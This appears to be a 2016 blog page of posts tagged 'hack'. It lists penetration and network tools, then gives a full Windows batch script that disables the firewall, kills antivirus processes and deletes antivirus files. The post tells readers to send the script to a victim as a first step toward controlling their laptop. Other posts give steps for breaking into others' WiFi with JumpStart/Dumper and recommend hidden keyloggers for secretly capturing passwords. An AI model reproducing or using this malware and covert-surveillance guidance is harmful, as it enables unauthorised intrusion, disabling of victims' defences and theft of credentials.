Showing posts with label hack. Show all posts
Showing posts with label hack. Show all posts

February 14, 2016

Some of the Best Hackers and Penetration tools





Aircrack-ng 



focuses on different areas of WiFi security:
  • Monitoring: Packet capture and export of data to text files for further processing by third party tools.
  • Attacking: Replay attacks, deauthentication, fake access points and others via packet injection.
  • Testing: Checking WiFi cards and driver capabilities (capture and injection).
  • Cracking: WEP and WPA PSK (WPA 1 and 2).

All tools are command line which allows for heavy scripting.







Wireshark


Let’s you see what’s happening on your network at a microscopic level. You can see what flows through the network and it captures all network data.


    Download






Metasploit




Metasploit is a penetration testing platform that enables you to find, exploit, and validate vulnerabilities. 


    Download


Nmap

it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, bypass firewall for port scanning and IDS detection.


     Download



NetCat




Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.
It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.


     Download



Snort



Snort is an open source network intrusion prevention system, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching, and can be used to detect a variety of attacks and probes.


      Download




Tor


Tor's users employ this network by connecting through a series of virtual tunnels rather than making a direct connection, thus allowing both organizations and individuals to share information over public networks without compromising their privacy. Along the same line, Tor is an effective censorship circumvention tool, allowing its users to reach otherwise blocked destinations or content.


     Download





aircrack hack metasploit netcat network nmap penetration tools security snort software tor windows wireshark

February 10, 2016

Make a Virus to Kill an Antivirus on any laptop



Do you have any purpose for killing someone’s Antivirus?
Do you need to do this like a first step to try and control someone’s laptop?

Okey, so this article will show you how to create an Antivirus that disables any laptop after sending it.

To do so, first of all open first of all you need to open Notepad and to copy this code in it:

@ echo off
rem —
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky\*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy\*.exe
del /Q /F C:\Program Files\panda software\*.*
rem —


After doing so, save the file under the name you want but the extension must be .bat

Now the only thing left is to send it to the person needed and as soon as they execute it there Antivirus will be disabled.

antivirus disable hack virus windows

January 28, 2016

How to hack Wifi using JumpStart and Dumper




This article will teach you how to hack 
wifi using the software Jumpstart and Dumper step by step.







First of all you start Dumper, then click on scan to see all the available Wi-Fi





Then go to Wps click on Todas las redes then click scan. Choose the Wi-Fi you want and click on Iniciar JumpStart.






JumpStart will open up the configuration will start. When it’s complete click finish.

Here we go in some simple and easy steps you are connected to any Wi-Fi you choose.





dumper hack internet jumper jumper dumper password wifi windows

January 25, 2016

How to know everything that happens in your computer





Do you want to keep track of the keys struck on the keyboard secretly?


In most of the cases, the user is unaware of the key-logger tracking the key strokes as the main idea behind using a key-logger is to track the key strokes secretively. 

If you are worried about the safety of your computer, your information or you simply just want to keep track of everything that happens in your laptop when someone else is using it. 

Here are some free key-logger software for you:


1.    Free keylogger
Free Key logger intercepts everything that is typed on keyboard, monitors clipboard changes and all internet navigation. It collects this information to secret reports on a hard drive, so you can view it later. This program is invisible for everyone except you. Just press special hot key to unhide it.

2. REFOG Free key-logger
REFOG Free key-logger is software which works like a tape recorder running in hidden mode. It captures all the typed data, username, passwords, emails, chats... once the computer turns on.

3. Home key-logger
Home key-logger is software intended for recording all the matter entered from the keyboard. The program neatly records every activity or event while working in the hidden mode.

4. Revealer key-logger
Revealer key-logger is a software that records all the matter or activity of the laptop and generates a report for the administrator. This software records information about keyboard inputs, the executed programs, visited pages and opened file. It records the date and time of these actions to know all the details. And this program is completely invisible.

5. Kidlogger
Kidlogger is a very simple software designed with an intention of tracking kids activities by parents at home. It records in a log file, all the activity of a user on internet like chat room interactions, all the visited websites…

6. Actual key-logger
Actual key-logger runs in the background and automatically records the keystrokes. Generated log files can be in encrypted form and the interface can also be protected with password. The log file displays everything typed, online money transactions...






control hack keylogger linux security spy windows

 

Click if you're interested

Copyright © Everything you need to know ™ is a registered trademark.